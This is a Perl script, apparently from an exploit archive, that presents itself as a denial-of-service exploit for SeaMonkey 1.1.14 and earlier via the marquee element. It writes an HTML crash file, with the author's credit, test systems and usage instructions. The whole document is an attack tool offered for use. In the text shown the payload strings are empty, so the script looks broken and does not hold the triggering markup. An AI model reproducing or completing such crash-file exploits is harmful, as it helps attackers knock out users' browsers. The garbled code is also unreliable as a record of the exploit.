#!/usr/bin/perl # SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit # by athos - staker[at]hotmail[dot]it # tested on ubuntu 8.10 / slackware 12.2 # thanks to SirDark because he has tested on slackware my $data = undef; my $file = shift or &usage; exploit(); sub exploit { $data .= ""; $data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit"; $data .= ""; $data .= "" x900; $data .= ""; open(FILE,'>',$file) or die('file error'); print FILE $data; close(FILE); } sub usage { print "\n+---------------------------------------------------------+\r". "\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r". "\n+---------------------------------------------------------+\r". "\nby athos - staker[at]hotmail[dot]it\n". "\nUsage\n". "\rperl $0 [file name]\n". "\rperl $0 crash.html\n"; exit; }